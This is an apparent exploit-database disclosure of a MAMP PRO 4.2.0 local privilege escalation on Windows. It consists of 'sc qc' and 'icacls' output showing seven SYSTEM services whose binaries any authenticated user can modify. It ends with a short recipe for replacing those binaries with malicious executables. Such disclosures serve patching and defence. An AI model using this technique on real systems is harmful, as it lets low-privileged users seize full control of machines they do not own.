Share
## https://sploitus.com/exploit?id=PACKETSTORM:158573
# Exploit Title: MAMP PRO 4.2.0 Local Privilege Escalation
# Date: 2020-07-08
# Exploit Author: b1nary
# Vendor Homepage: https://www.mamp.info/
# Software Link: https://downloads.mamp.info/MAMP-PRO-WINDOWS/releases/4.2.0/MAMP_MAMP_PRO_4.2.0.exe
# Version: 4.2.0
# Tested on: Windows 10 Pro x64 Version 10.0.19041
MAMPPRO Windows installer installs seven services called 'MAMPPRO’, 'MAMPPRO-Apache', ‘MAMPPRO-MySQL’, ’MAMPDNS’, ‘MAMPPRO-Memcached', ‘emailrelay-service.exe’, and 'MAMPPRO-NGINX'. All those services runs with 'SYSTEM' privileges and they have weak file permission. Which means that a low-privileged user can modify those services and execute code with ‘SYSTEM’ privileges on the system.
NT AUTHORITY\Authenticated Users:(I)(M) means that every authenticated user has modify access, (M) stands for Modify, on the files, so they can read, write and delete the files.
=================================================================
(1). ===== MAMPPRO =====
C:\Users\user>sc qc MAMPPRO
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MAMPPRO
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\MAMPPRO\MAMPPROService.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MAMPRO Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\MAMPPRO>icacls c:\MAMPPRO\MAMPPROService.exe
C:\MAMPPRO\MAMPPROService.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
(2). ===== MAMPPRO-Apache =====
C:\Users\user>sc qc MAMPPRO-Apache
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MAMPPRO-Apache
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\MAMP\bin\apache\bin\httpd.exe" -k runservice
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MAMPPRO-Apache
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "c:\MAMP\bin\apache\bin\httpd.exe"
c:\MAMP\bin\apache\bin\httpd.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
(3). ===== MAMPPRO-MySQL =====
C:\Users\user>sc qc MAMPPRO-MySQL
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MAMPPRO-MySQL
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\MAMP\bin\mysql\bin\mysqld.exe --defaults-file=C:\Users\Public\Documents\Appsolute\MAMPPRO\conf\my.ini MAMPPRO-MySQL
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MAMPPRO-MySQL
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\MAMP\bin\mysql\bin\mysqld.exe"
C:\MAMP\bin\mysql\bin\mysqld.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
(4). ===== MAMPDNS =====
C:\Users\user>sc qc MAMPDNS
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MAMPDNS
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\MAMPPRO\MAMPDNSService.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MAMPRO DNS Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\MAMPPRO\MAMPDNSService.exe"
C:\MAMPPRO\MAMPDNSService.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
(5). ===== MAMPPRO-Memcached =====
C:\Users\user>sc qc MAMPPRO-Memcached
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MAMPPRO-Memcached
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\MAMPPRO\MAMPMemcached.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MAMPPRO-Memcached
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\MAMPPRO\MAMPMemcached.exe"
C:\MAMPPRO\MAMPMemcached.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
(6). ===== MAMPPRO-NGINX =====
C:\Users\user>sc qc MAMPPRO-NGINX
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MAMPPRO-NGINX
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\MAMPPRO\MAMPNGINX.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MAMPPRO-NGINX
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\MAMPPRO\MAMPNGINX.exe"
C:\MAMPPRO\MAMPNGINX.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
(7). ===== emailrelay =====
C:\Users\user>sc qc emailrelay
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: emailrelay
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\MAMP\bin\emailrelay\emailrelay-service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : E-MailRelay
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\MAMP\bin\emailrelay\emailrelay-service.exe"
C:\MAMP\bin\emailrelay\emailrelay-service.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
=================================================================
In order to exploit this vulnerability, a local attacker must insert an executable file that should be named as one of the following 'MAMPDNSService.exe' 'MAMPPROService.exe', 'httpd.exe', 'MAMPMemcached.exe', 'mysqld.exe’, ‘emailrelay-service.exe’ or 'MAMPNGINX.exe' , and replace the original files. Once the services start the malicious files will be executed as SYSTEM.